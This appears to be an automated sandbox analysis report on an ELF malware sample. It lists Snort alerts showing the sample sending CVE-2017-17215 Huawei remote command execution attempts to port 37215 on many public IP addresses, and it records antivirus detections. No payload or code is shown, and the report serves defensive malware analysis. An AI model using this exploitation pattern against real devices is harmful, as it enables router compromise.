          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044162
          SID:2835222
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547719
          SID:2835222
          Source Port:43400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208945
          SID:2829579
          Source Port:33200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671644
          SID:2829579
          Source Port:57092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797511
          SID:2829579
          Source Port:46960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592966
          SID:2829579
          Source Port:57236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893521
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422139
          SID:2835222
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484588
          SID:2835222
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487550
          SID:2835222
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295361
          SID:2829579
          Source Port:33702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301235
          SID:2835222
          Source Port:44660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067308
          SID:2835222
          Source Port:60948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838658
          SID:2829579
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941679
          SID:2829579
          Source Port:47796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726695
          SID:2829579
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840572
          SID:2835222
          Source Port:51684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590905
          SID:2835222
          Source Port:33672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893461
          SID:2835222
          Source Port:58590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325684
          SID:2835222
          Source Port:38858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943957
          SID:2835222
          Source Port:48422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211883
          SID:2835222
          Source Port:51848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549464
          SID:2829579
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311183
          SID:2835222
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537282
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859068
          SID:2829579
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206420
          SID:2835222
          Source Port:42280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132900
          SID:2835222
          Source Port:52544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476778
          SID:2829579
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636086
          SID:2829579
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650595
          SID:2829579
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299721
          SID:2835222
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177995
          SID:2829579
          Source Port:48840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927634
          SID:2829579
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138104
          SID:2829579
          Source Port:35088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745737
          SID:2835222
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949260
          SID:2829579
          Source Port:40616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267680
          SID:2835222
          Source Port:38260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228510
          SID:2829579
          Source Port:57118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486571
          SID:2829579
          Source Port:45976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361391
          SID:2835222
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890095
          SID:2829579
          Source Port:46106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611858
          SID:2829579
          Source Port:48470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781233
          SID:2835222
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152178
          SID:2829579
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741812
          SID:2829579
          Source Port:58466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778592
          SID:2829579
          Source Port:47002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152885
          SID:2829579
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671449
          SID:2829579
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874105
          SID:2829579
          Source Port:55444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660385
          SID:2835222
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301250
          SID:2835222
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592165
          SID:2835222
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.490207
          SID:2829579
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874770
          SID:2829579
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989509
          SID:2835222
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.996370
          SID:2829579
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228450
          SID:2835222
          Source Port:36556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666466
          SID:2835222
          Source Port:35402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154685
          SID:2835222
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033268
          SID:2829579
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530047
          SID:2835222
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302889
          SID:2829579
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588628
          SID:2829579
          Source Port:50290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592966
          SID:2829579
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064893
          SID:2829579
          Source Port:58702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325286
          SID:2835222
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465355
          SID:2829579
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818094
          SID:2829579
          Source Port:58446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996676
          SID:2835222
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877505
          SID:2835222
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324055
          SID:2835222
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745737
          SID:2835222
          Source Port:39010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714537
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922499
          SID:2829579
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127684
          SID:2835222
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183645
          SID:2829579
          Source Port:56016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464285
          SID:2835222
          Source Port:47726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336679
          SID:2835222
          Source Port:45710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618485
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237499
          SID:2829579
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501363
          SID:2829579
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772150
          SID:2835222
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594894
          SID:2829579
          Source Port:38992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415929
          SID:2829579
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416338
          SID:2829579
          Source Port:47648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355797
          SID:2835222
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202948
          SID:2829579
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321094
          SID:2835222
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536388
          SID:2829579
          Source Port:60738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689147
          SID:2835222
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064236
          SID:2835222
          Source Port:36672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.094226
          SID:2835222
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476513
          SID:2835222
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051177
          SID:2835222
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010902
          SID:2829579
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941371
          SID:2829579
          Source Port:38268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338172
          SID:2835222
          Source Port:38758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322138
          SID:2835222
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958786
          SID:2835222
          Source Port:33648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039568
          SID:2829579
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976669
          SID:2835222
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105591
          SID:2829579
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465186
          SID:2835222
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847471
          SID:2829579
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529055
          SID:2829579
          Source Port:49644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145218
          SID:2835222
          Source Port:40164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271617
          SID:2835222
          Source Port:58744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847372
          SID:2835222
          Source Port:39088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207153
          SID:2829579
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.444134
          SID:2829579
          Source Port:46174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113220
          SID:2829579
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535400
          SID:2829579
          Source Port:39216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322133
          SID:2829579
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592473
          SID:2829579
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178888
          SID:2829579
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743333
          SID:2829579
          Source Port:43100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946649
          SID:2829579
          Source Port:39548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527906
          SID:2829579
          Source Port:50046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793929
          SID:2829579
          Source Port:57610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795945
          SID:2835222
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224185
          SID:2829579
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116767
          SID:2829579
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847676
          SID:2835222
          Source Port:35860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485372
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551032
          SID:2829579
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130666
          SID:2829579
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665660
          SID:2829579
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889391
          SID:2829579
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126692
          SID:2829579
          Source Port:44414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064010
          SID:2829579
          Source Port:33178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989716
          SID:2835222
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705819
          SID:2829579
          Source Port:59948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664315
          SID:2829579
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86.nn.elfAvira: detected
          Source: x86.nn.elfJoe Sandbox ML: detected

          Networking

          barindex
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51164 -> 197.19.68.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51164 -> 197.19.68.200:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36202 -> 197.108.98.81:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36202 -> 197.108.98.81:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47496 -> 157.22.232.44:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47496 -> 157.22.232.44:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50322 -> 41.217.239.125:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50322 -> 41.217.239.125:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56392 -> 197.11.136.200:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56392 -> 197.11.136.200:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54126 -> 162.189.159.97:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54126 -> 162.189.159.97:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44662 -> 197.55.193.145:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44662 -> 197.55.193.145:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58056 -> 197.126.181.1:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58056 -> 197.126.181.1:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39428 -> 41.155.18.75:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39428 -> 41.155.18.75:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34812 -> 207.230.18.128:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34812 -> 207.230.18.128:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37490 -> 32.70.63.136:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37490 -> 32.70.63.136:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40452 -> 197.42.140.11:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40452 -> 197.42.140.11:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34260 -> 157.212.119.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34260 -> 157.212.119.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32816 -> 157.157.26.182:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32816 -> 157.157.26.182:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43090 -> 157.193.222.248:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43090 -> 157.193.222.248:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35122 -> 41.188.130.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35122 -> 41.188.130.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38888 -> 41.105.159.159:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38888 -> 41.105.159.159:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49842 -> 25.220.131.205:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49842 -> 25.220.131.205:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50886 -> 41.69.170.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50886 -> 41.69.170.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55318 -> 41.179.57.12:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55318 -> 41.179.57.12:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38692 -> 165.13.117.149:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38692 -> 165.13.117.149:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40494 -> 178.64.112.9:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40494 -> 178.64.112.9:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48418 -> 157.170.92.181:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48418 -> 157.170.92.181:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33054 -> 109.169.161.130:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33054 -> 109.169.161.130:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56050 -> 207.124.200.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56050 -> 207.124.200.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45132 -> 157.4.171.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45132 -> 157.4.171.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36990 -> 41.60.71.214:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36990 -> 41.60.71.214:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37890 -> 197.203.50.211:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37890 -> 197.203.50.211:37215
